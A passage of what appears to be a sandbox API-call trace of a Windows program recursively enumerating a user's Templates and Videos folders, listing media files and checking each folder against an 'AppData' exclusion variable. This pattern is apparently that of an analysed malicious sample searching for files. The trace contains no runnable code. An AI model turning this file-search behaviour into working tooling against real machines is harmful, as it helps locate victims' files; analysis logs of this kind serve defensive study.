ftLastAccessTime.dwHighDateTime=0x9ba00e, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x85a028c, nFileSizeHigh=0x4903, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x8a7560, cFileName="", cAlternateFileName="\x8d\x87ဓ+\x10")) returned 0xffffffff [0157.944] FindNextFileW (in: hFindFile=0x90ad98, lpFindFileData=0x87eac8 | out: lpFindFileData=0x87eac8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x2914fe20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x8a7560, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1 [0157.944] CharUpperBuffW (in: lpsz="__CHEXCLUDEFOLDERS", cchLength=0x12 | out: lpsz="__CHEXCLUDEFOLDERS") returned 0x12 [0157.944] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Templates", cchCount1=9, lpString2="AppData", cchCount2=7) returned 3 [0157.944] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0157.944] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\*", lpFindFileData=0x87e888 | out: lpFindFileData=0x87e888*(dwFileAttributes=0x7738e0d2, ftCreationTime.dwLowDateTime=0x9ba720, ftCreationTime.dwHighDateTime=0x60, ftLastAccessTime.dwLowDateTime=0x1, ftLastAccessTime.dwHighDateTime=0x9ba00e, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x85a028c, nFileSizeHigh=0x492c, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x8a7560, cFileName="", cAlternateFileName="\x8d\x87ဓ+\x10")) returned 0xffffffff [0157.945] FindNextFileW (in: hFindFile=0x90ad98, lpFindFileData=0x87eac8 | out: lpFindFileData=0x87eac8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xdad83aa0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdad83aa0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x87ed94, dwReserved1=0x8a7560, cFileName="Videos", cAlternateFileName="")) returned 1 [0157.945] CharUpperBuffW (in: lpsz="__CHEXCLUDEFOLDERS", cchLength=0x12 | out: lpsz="__CHEXCLUDEFOLDERS") returned 0x12 [0157.945] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Videos", cchCount1=6, lpString2="AppData", cchCount2=7) returned 3 [0157.945] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0157.945] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*", lpFindFileData=0x87e888 | out: lpFindFileData=0x87e888*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xdad83aa0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdad83aa0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x8a7560, cFileName=".", cAlternateFileName="")) returned 0x90ae58 [0157.947] FindNextFileW (in: hFindFile=0x90ae58, lpFindFileData=0x87e888 | out: lpFindFileData=0x87e888*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xdad83aa0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdad83aa0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x8a7560, cFileName="..", cAlternateFileName="")) returned 1 [0157.947] FindNextFileW (in: hFindFile=0x90ae58, lpFindFileData=0x87e888 | out: lpFindFileData=0x87e888*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x35803a20, ftCreationTime.dwHighDateTime=0x1d5e1af, ftLastAccessTime.dwLowDateTime=0xccfc6ac0, ftLastAccessTime.dwHighDateTime=0x1d5e3c3, ftLastWriteTime.dwLowDateTime=0xccfc6ac0, ftLastWriteTime.dwHighDateTime=0x1d5e3c3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x8a7560, cFileName="0ntYY6p", cAlternateFileName="")) returned 1 [0157.947] CharUpperBuffW (in: lpsz="__CHEXCLUDEFOLDERS", cchLength=0x12 | out: lpsz="__CHEXCLUDEFOLDERS") returned 0x12 [0157.948] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0ntYY6p", cchCount1=7, lpString2="AppData", cchCount2=7) returned 1 [0157.948] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0157.948] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0ntYY6p\\*", lpFindFileData=0x87e630 | out: lpFindFileData=0x87e630*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x35803a20, ftCreationTime.dwHighDateTime=0x1d5e1af, ftLastAccessTime.dwLowDateTime=0xccfc6ac0, ftLastAccessTime.dwHighDateTime=0x1d5e3c3, ftLastWriteTime.dwLowDateTime=0xccfc6ac0, ftLastWriteTime.dwHighDateTime=0x1d5e3c3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x8a7560, cFileName=".", cAlternateFileName="")) returned 0x90af18 [0157.950] FindNextFileW (in: hFindFile=0x90af18, lpFindFileData=0x87e630 | out: lpFindFileData=0x87e630*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x35803a20, ftCreationTime.dwHighDateTime=0x1d5e1af, ftLastAccessTime.dwLowDateTime=0xccfc6ac0, ftLastAccessTime.dwHighDateTime=0x1d5e3c3, ftLastWriteTime.dwLowDateTime=0xccfc6ac0, ftLastWriteTime.dwHighDateTime=0x1d5e3c3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x8a7560, cFileName="..", cAlternateFileName="")) returned 1 [0157.950] FindNextFileW (in: hFindFile=0x90af18, lpFindFileData=0x87e630 | out: lpFindFileData=0x87e630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc8e0e70, ftCreationTime.dwHighDateTime=0x1d5e803, ftLastAccessTime.dwLowDateTime=0x46566030, ftLastAccessTime.dwHighDateTime=0x1d5dc83, ftLastWriteTime.dwLowDateTime=0x46566030, ftLastWriteTime.dwHighDateTime=0x1d5dc83, nFileSizeHigh=0x0, nFileSizeLow=0xfcbc, dwReserved0=0x2020e02, dwReserved1=0x8a7560, cFileName="-AawcGHZf1n-uzNR9.mp4", cAlternateFileName="-AAWCG~1.MP4")) returned 1 [0157.950] FindNextFileW (in: hFindFile=0x90af18, lpFindFileData=0x87e618 | out: lpFindFileData=0x87e618*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7e4feb80, ftCreationTime.dwHighDateTime=0x1d5daaa, ftLastAccessTime.dwLowDateTime=0xfe4da90, ftLastAccessTime.dwHighDateTime=0x1d5d7b0, ftLastWriteTime.dwLowDateTime=0xfe4da90, ftLastWriteTime.dwHighDateTime=0x1d5d7b0, nFileSizeHigh=0x0, nFileSizeLow=0xaee7, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="aXsAYPuZRSCYMOeip6.mkv", cAlternateFileName="AXSAYP~1.MKV")) returned 1 [0157.951] FindNextFileW (in: hFindFile=0x90af18, lpFindFileData=0x87e618 | out: lpFindFileData=0x87e618*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc71b0f80, ftCreationTime.dwHighDateTime=0x1d5e0cb, ftLastAccessTime.dwLowDateTime=0xf8e453b0, ftLastAccessTime.dwHighDateTime=0x1d5d972, ftLastWriteTime.dwLowDateTime=0xf8e453b0, ftLastWriteTime.dwHighDateTime=0x1d5d972, nFileSizeHigh=0x0, nFileSizeLow=0xc1eb, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="IipHJEO8.mp4", cAlternateFileName="")) returned 1 [0157.951] FindNextFileW (in: hFindFile=0x90af18, lpFindFileData=0x87e618 | out: lpFindFileData=0x87e618*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd7559120, ftCreationTime.dwHighDateTime=0x1d5dcb8, ftLastAccessTime.dwLowDateTime=0x94e2e2b0, ftLastAccessTime.dwHighDateTime=0x1d5db88, ftLastWriteTime.dwLowDateTime=0x94e2e2b0, ftLastWriteTime.dwHighDateTime=0x1d5db88, nFileSizeHigh=0x0, nFileSizeLow=0x18cd8, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="sQ9weB5Cn_9JdUcj7P.mp4", cAlternateFileName="SQ9WEB~1.MP4")) returned 1 [0157.951] FindNextFileW (in: hFindFile=0x90af18, lpFindFileData=0x87e618 | out: lpFindFileData=0x87e618*(dwFileAttributes=0xf40067, ftCreationTime.dwLowDateTime=0x5049, ftCreationTime.dwHighDateTime=0x89fe58, ftLastAccessTime.dwLowDateTime=0x773d1ecd, ftLastAccessTime.dwHighDateTime=0x7e8b71, ftLastWriteTime.dwLowDateTime=0x13, ftLastWriteTime.dwHighDateTime=0x1320068, nFileSizeHigh=0x5049, nFileSizeLow=0x909410, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="sQ\x08", cAlternateFileName="\x8d\x87ဓ+\x10")) returned 0 [0157.951] FindClose (in: hFindFile=0x90af18 | out: hFindFile=0x90af18) returned 1 [0157.952] FindNextFileW (in: hFindFile=0x90ae58, lpFindFileData=0x87e870 | out: lpFindFileData=0x87e870*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4e8d1720, ftCreationTime.dwHighDateTime=0x1d5e710, ftLastAccessTime.dwLowDateTime=0x23a8b590, ftLastAccessTime.dwHighDateTime=0x1d5e71b, ftLastWriteTime.dwLowDateTime=0x23a8b590, ftLastWriteTime.dwHighDateTime=0x1d5e71b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x8a7364, dwReserved1=0x8a7560, cFileName="CCOSsWXcEV8ZF", cAlternateFileName="CCOSSW~1")) returned 1 [0157.952] CharUpperBuffW (in: lpsz="__CHEXCLUDEFOLDERS", cchLength=0x12 | out: lpsz="__CHEXCLUDEFOLDERS") returned 0x12 [0157.952] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CCOSsWXcEV8ZF", cchCount1=13, lpString2="AppData", cchCount2=7) returned 3 [0157.952] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0157.952] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\CCOSsWXcEV8ZF\\*", lpFindFileData=0x87e630 | out: lpFindFileData=0x87e630*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4e8d1720, ftCreationTime.dwHighDateTime=0x1d5e710, ftLastAccessTime.dwLowDateTime=0x23a8b590, ftLastAccessTime.dwHighDateTime=0x1d5e71b, ftLastWriteTime.dwLowDateTime=0x23a8b590, ftLastWriteTime.dwHighDateTime=0x1d5e71b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x8a7560, cFileName=".", cAlternateFileName="")) returned 0x90af18 [0157.953] FindNextFileW (in: hFindFile=0x90af18, lpFindFileData=0x87e630 | out: lpFindFileData=0x87e630*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4e8d1720, ftCreationTime.dwHighDateTime=0x1d5e710, ftLastAccessTime.dwLowDateTime=0x23a8b590, ftLastAccessTime.dwHighDateTime=0x1d5e71b, ftLastWriteTime.dwLowDateTime=0x23a8b590, ftLastWriteTime.dwHighDateTime=0x1d5e71b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x8a7560, cFileName="..", cAlternateFileName="")) returned 1 [0157.953] FindNextFileW (in: hFindFile=0x90af18, lpFindFileData=0x87e630 | out: lpFindFileData=0x87e630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x687dfa70, ftCreationTime.dwHighDateTime=0x1d5e7ae, ftLastAccessTime.dwLowDateTime=0xdc4fcb20, ftLastAccessTime.dwHighDateTime=0x1d5e3aa, ftLastWriteTime.dwLowDateTime=0xdc4fcb20, ftLastWriteTime.dwHighDateTime=0x1d5e3aa, nFileSizeHigh=0x0, nFileSizeLow=0x1227e, dwReserved0=0x2020e02, dwReserved1=0x8a7560, cFileName="7999fJY.mkv", cAlternateFileName="")) returned 1 [0157.953] FindNextFileW (in: hFindFile=0x90af18, lpFindFileData=0x87e618 | out: lpFindFileData=0x87e618*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd2d108d0, ftCreationTime.dwHighDateTime=0x1d5e51b, ftLastAccessTime.dwLowDateTime=0x4261b480, ftLastAccessTime.dwHighDateTime=0x1d5da61, ftLastWriteTime.dwLowDateTime=0x4261b480, ftLastWriteTime.dwHighDateTime=0x1d5da61, nFileSizeHigh=0x0, nFileSizeLow=0x8fd6, dwReserved0=0x8a0000, dwReserved1=0x8a7560, cFileName="GwLjRbpo46x9NeDS.mkv", cAlternateFileName="GWLJRB~1.MKV")) returned 1 [0157.953] FindNextFileW (in: hFindFile=0x90af18, lpFindFileData=0x87e618 | out: lpFindFileData=0x87e618*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xde8559c0, ftCreationTime.dwHighDateTime=0x1d5e560, ftLastAccessTime.dwLowDateTime=0x460bbc0, ftLastAccessTime.dwHighDateTime=0x1d5e69d, ftLastWriteTime.dwLowDateTime=0x460bbc0, ftLastWriteTime.dwHighDateTime=0x1d5e69d, nFileSizeHigh=0x0, nFileSizeLow=0x71e4, dwReserved0=0x8a0000, dwReserved1=0x8a7560, cFileName="S8EN.mkv", cAlternateFileName="")) returned 1 [0157.954] FindNextFileW (in: hFindFile=0x90af18, lpFindFileData=0x87e618 | out: lpFindFileData=0x87e618*(dwFileAttributes=0x1320067, ftCreationTime.dwLowDateTime=0x50ac, ftCreationTime.dwHighDateTime=0x89fe58, ftLastAccessTime.dwLowDateTime=0x773d1ecd, ftLastAccessTime.dwHighDateTime=0x7e8b71, ftLastWriteTime.dwLowDateTime=0x11, ftLastWriteTime.dwHighDateTime=0xf20068, nFileSizeHigh=0x50ac, nFileSizeLow=0x909410, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="S8\x08", cAlternateFileName="\x8d\x87ဓ+\x10")) returned 0 [0157.954] FindClose (in: hFindFile=0x90af18 | out: hFindFile=0x90af18) returned 1 [0157.954] FindNextFileW (in: hFindFile=0x90ae58, lpFindFileData=0x87e870 | out: lpFindFileData=0x87e870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc22a3ef0, ftCreationTime.dwHighDateTime=0x1d5e70c, ftLastAccessTime.dwLowDateTime=0xa9d8a260, ftLastAccessTime.dwHighDateTime=0x1d5daaa, ftLastWriteTime.dwLowDateTime=0xa9d8a260, ftLastWriteTime.dwHighDateTime=0x1d5daaa, nFileSizeHigh=0x0, nFileSizeLow=0x1ceb, dwReserved0=0x8a7364, dwReserved1=0x8a7560, cFileName="cWKRu.avi", cAlternateFileName="")) returned 1 [0157.954] FindNextFileW (in: hFindFile=0x90ae58, lpFindFileData=0x87e870 | out: lpFindFileData=0x87e870*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0157.954] FindNextFileW (in: hFindFile=0x90ae58, lpFindFileData=0x87e870 | out: lpFindFileData=0x87e870*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe85f1720, ftCreationTime.dwHighDateTime=0x1d5d998, ftLastAccessTime.dwLowDateTime=0xa90743f0, ftLastAccessTime.dwHighDateTime=0x1d5e342, ftLastWriteTime.dwLowDateTime=0xa90743f0, ftLastWriteTime.dwHighDateTime=0x1d5e342, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="Ffd495B2eqP", cAlternateFileName="FFD495~1")) returned 1 [0157.954] CharUpperBuffW (in: lpsz="__CHEXCLUDEFOLDERS", cchLength=0x12 | out: lpsz="__CHEXCLUDEFOLDERS") returned 0x12 [0157.954] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ffd495B2eqP", cchCount1=11, lpString2="AppData", cchCount2=7) returned 3 [0157.954] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0157.954] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Ffd495B2eqP\\*", lpFindFileData=0x87e630 | out: lpFindFileData=0x87e630*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe85f1720, ftCreationTime.dwHighDateTime=0x1d5d998, ftLastAccessTime.dwLowDateTime=0xa90743f0, ftLastAccessTime.dwHighDateTime=0x1d5e342, ftLastWriteTime.dwLowDateTime=0xa90743f0, ftLastWriteTime.dwHighDateTime=0x1d5e342, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x8a7560, cFileName=".", cAlternateFileName="")) returned 0x90af18 [0157.956] FindNextFileW (in: hFindFile=0x90af18, lpFindFileData=0x87e630 | out: lpFindFileData=0x87e630*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe85f1720, ftCreationTime.dwHighDateTime=0x1d5d998, ftLastAccessTime.dwLowDateTime=0xa90743f0, ftLastAccessTime.dwHighDateTime=0x1d5e342, ftLastWriteTime.dwLowDateTime=0xa90743f0, ftLastWriteTime.dwHighDateTime=0x1d5e342, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x8a7560, cFileName="..", cAlternateFileName="")) returned 1 [0157.956] FindNextFileW (in: hFindFile=0x90af18, lpFindFileData=0x87e630 | out: lpFindFileData=0x87e630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xff468790, ftCreationTime.dwHighDateTime=0x1d5dfb3, ftLastAccessTime.dwLowDateTime=0xdf92db70, ftLastAccessTime.dwHighDateTime=0x1d5d9d6, ftLastWriteTime.dwLowDateTime=0xdf92db70, ftLastWriteTime.dwHighDateTime=0x1d5d9d6, nFileSizeHigh=0x0, nFileSizeLow=0x6ccb, dwReserved0=0x2020e02, dwReserved1=0x8a7560, cFileName="sw3Tjl.mkv", cAlternateFileName="")) returned 1 [0157.956] FindNextFileW (in: hFindFile=0x90af18, lpFindFileData=0x87e618 | out: lpFindFileData=0x87e618*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdac5c230, ftCreationTime.dwHighDateTime=0x1d5e3ca, ftLastAccessTime.dwLowDateTime=0x34054cb0, ftLastAccessTime.dwHighDateTime=0x1d5d919, ftLastWriteTime.dwLowDateTime=0x34054cb0, ftLastWriteTime.dwHighDateTime=0x1d5d919, nFileSizeHigh=0x0, nFileSizeLow=0x14d15, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="VGkX.swf", cAlternateFileName="")) returned 1 [0157.956] FindNextFileW (in: hFindFile=0x90af18, lpFindFileData=0x87e618 | out: lpFindFileData=0x87e618*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x954c2e20, ftCreationTime.dwHighDateTime=0x1d5e3d3, ftLastAccessTime.dwLowDateTime=0xbfc92110, ftLastAccessTime.dwHighDateTime=0x1d5e425, ftLastWriteTime.dwLowDateTime=0xbfc92110, ftLastWriteTime.dwHighDateTime=0x1d5e425, nFileSizeHigh=0x0, nFileSizeLow=0xb330, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="xhiatAIn2v.avi", cAlternateFileName="XHIATA~1.AVI")) returned 1 [0157.957] FindNextFileW (in: hFindFile=0x90af18, lpFindFileData=0x87e618 | out: lpFindFileData=0x87e618*(dwFileAttributes=0xf20067, ftCreationTime.dwLowDateTime=0x5129, ftCreationTime.dwHighDateTime=0x89fe58, ftLastAccessTime.dwLowDateTime=0x773d1ecd, ftLastAccessTime.dwHighDateTime=0x7e8b71, ftLastWriteTime.dwLowDateTime=0x11, ftLastWriteTime.dwHighDateTime=0xee0068, nFileSizeHigh=0x5129, nFileSizeLow=0x23, dwReserved0=0x8a0000, dwReserved1=0x8a7560, cFileName="\x87\x08", cAlternateFileName="\x8d\x87ဓ+\x10")) returned 0 [0157.957] FindClose (in: hFindFile=0x90af18 | out: hFindFile=0x90af18) returned 1 [0157.957] FindNextFileW (in: hFindFile=0x90ae58, lpFindFileData=0x87e870 | out: lpFindFileData=0x87e870*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xef505ee0, ftCreationTime.dwHighDateTime=0x1d5d876, ftLastAccessTime.dwLowDateTime=0x8a412710, ftLastAccessTime.dwHighDateTime=0x1d5e824, ftLastWriteTime.dwLowDateTime=0x8a412710, ftLastWriteTime.dwHighDateTime=0x1d5e824, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x8a7364, dwReserved1=0x8a7560, cFileName="FoKJzmJBM6_F0eozYZo", cAlternateFileName="FOKJZM~1")) returned 1 [0157.957] CharUpperBuffW (in: lpsz="__CHEXCLUDEFOLDERS", cchLength=0x12 | out: lpsz="__CHEXCLUDEFOLDERS") returned 0x12 [0157.957] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FoKJzmJBM6_F0eozYZo", cchCount1=19, lpString2="AppData", cchCount2=7) returned 3 [0157.957] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0157.957] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\*", lpFindFileData=0x87e630 | out: lpFindFileData=0x87e630*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xef505ee0, ftCreationTime.dwHighDateTime=0x1d5d876, ftLastAccessTime.dwLowDateTime=0x8a412710, ftLastAccessTime.dwHighDateTime=0x1d5e824, ftLastWriteTime.dwLowDateTime=0x8a412710, ftLastWriteTime.dwHighDateTime=0x1d5e824, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x8a7560, cFileName=".", cAlternateFileName="")) returned 0x90af18 [0157.960] FindNextFileW (in: hFindFile=0x90af18, lpFindFileData=0x87e630 | out: lpFindFileData=0x87e630*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xef505ee0, ftCreationTime.dwHighDateTime=0x1d5d876, ftLastAccessTime.dwLowDateTime=0x8a412710, ftLastAccessTime.dwHighDateTime=0x1d5e824, ftLastWriteTime.dwLowDateTime=0x8a412710, ftLastWriteTime.dwHighDateTime=0x1d5e824, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x8a7560, cFileName="..", cAlternateFileName="")) returned 1 [0157.960] FindNextFileW (in: hFindFile=0x90af18, lpFindFileData=0x87e630 | out: lpFindFileData=0x87e630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11d91460, ftCreationTime.dwHighDateTime=0x1d5e6a1, ftLastAccessTime.dwLowDateTime=0x45eed560, ftLastAccessTime.dwHighDateTime=0x1d5e2d1, ftLastWriteTime.dwLowDateTime=0x45eed560, ftLastWriteTime.dwHighDateTime=0x1d5e2d1, nFileSizeHigh=0x0, nFileSizeLow=0x1418f, dwReserved0=0x2020e02, dwReserved1=0x8a7560, cFileName="-4jYTdy7DTgQ 7n_RHA.swf", cAlternateFileName="-4JYTD~1.SWF")) returned 1 [0157.960] FindNextFileW (in: hFindFile=0x90af18, lpFindFileData=0x87e618 | out: lpFindFileData=0x87e618*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe3806420, ftCreationTime.dwHighDateTime=0x1d5d9e8, ftLastAccessTime.dwLowDateTime=0x875e0470, ftLastAccessTime.dwHighDateTime=0x1d5da67, ftLastWriteTime.dwLowDateTime=0x875e0470, ftLastWriteTime.dwHighDateTime=0x1d5da67, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="4_L5NHX538Ki1", cAlternateFileName="4_L5NH~1")) returned 1 [0157.960] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0157.960] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\*", lpFindFileData=0x87e3d8 | out: lpFindFileData=0x87e3d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe3806420, ftCreationTime.dwHighDateTime=0x1d5d9e8, ftLastAccessTime.dwLowDateTime=0x875e0470, ftLastAccessTime.dwHighDateTime=0x1d5da67, ftLastWriteTime.dwLowDateTime=0x875e0470, ftLastWriteTime.dwHighDateTime=0x1d5da67, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x8a7560, cFileName=".", cAlternateFileName="")) returned 0x90afd8 [0157.963] FindNextFileW (in: hFindFile=0x90afd8, lpFindFileData=0x87e3d8 | out: lpFindFileData=0x87e3d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe3806420, ftCreationTime.dwHighDateTime=0x1d5d9e8, ftLastAccessTime.dwLowDateTime=0x875e0470, ftLastAccessTime.dwHighDateTime=0x1d5da67, ftLastWriteTime.dwLowDateTime=0x875e0470, ftLastWriteTime.dwHighDateTime=0x1d5da67, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x8a7560, cFileName="..", cAlternateFileName="")) returned 1 [0157.963] FindNextFileW (in: hFindFile=0x90afd8, lpFindFileData=0x87e3d8 | out: lpFindFileData=0x87e3d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3f5e8260, ftCreationTime.dwHighDateTime=0x1d5dd9d, ftLastAccessTime.dwLowDateTime=0x7011bde0, ftLastAccessTime.dwHighDateTime=0x1d5e2d5, ftLastWriteTime.dwLowDateTime=0x7011bde0, ftLastWriteTime.dwHighDateTime=0x1d5e2d5, nFileSizeHigh=0x0, nFileSizeLow=0xf4b5, dwReserved0=0x4, dwReserved1=0x8a7560, cFileName="4Us08VSplrH Ofh79JeB.mkv", cAlternateFileName="4US08V~1.MKV")) returned 1 [0157.963] FindNextFileW (in: hFindFile=0x90afd8, lpFindFileData=0x87e3c0 | out: lpFindFileData=0x87e3c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fb86e90, ftCreationTime.dwHighDateTime=0x1d5e79c, ftLastAccessTime.dwLowDateTime=0x9c8857a0, ftLastAccessTime.dwHighDateTime=0x1d5dfea, ftLastWriteTime.dwLowDateTime=0x9c8857a0, ftLastWriteTime.dwHighDateTime=0x1d5dfea, nFileSizeHigh=0x0, nFileSizeLow=0x22da, dwReserved0=0x8a0000, dwReserved1=0x8a7560, cFileName="6rBGDlSa.avi", cAlternateFileName="")) returned 1 [0157.963] FindNextFileW (in: hFindFile=0x90afd8, lpFindFileData=0x87e3c0 | out: lpFindFileData=0x87e3c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8dae39b0, ftCreationTime.dwHighDateTime=0x1d5dc44, ftLastAccessTime.dwLowDateTime=0x50adf490, ftLastAccessTime.dwHighDateTime=0x1d5e44d, ftLastWriteTime.dwLowDateTime=0x50adf490, ftLastWriteTime.dwHighDateTime=0x1d5e44d, nFileSizeHigh=0x0, nFileSizeLow=0xab9c, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="g9kkkj.mp4", cAlternateFileName="")) returned 1 [0157.964] FindNextFileW (in: hFindFile=0x90afd8, lpFindFileData=0x87e3c0 | out: lpFindFileData=0x87e3c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50390e50, ftCreationTime.dwHighDateTime=0x1d5e42f, ftLastAccessTime.dwLowDateTime=0xd54794f0, ftLastAccessTime.dwHighDateTime=0x1d5deb6, ftLastWriteTime.dwLowDateTime=0xd54794f0, 